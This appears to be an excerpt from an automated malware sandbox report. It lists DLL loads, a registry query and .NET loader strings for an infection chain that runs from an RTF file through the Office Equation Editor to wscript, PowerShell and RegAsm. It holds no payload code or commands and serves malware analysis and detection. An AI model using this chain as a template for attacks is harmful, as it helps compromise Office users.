                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: shcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: nlaapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                Source: xnHel.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\xnHel.rtf
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
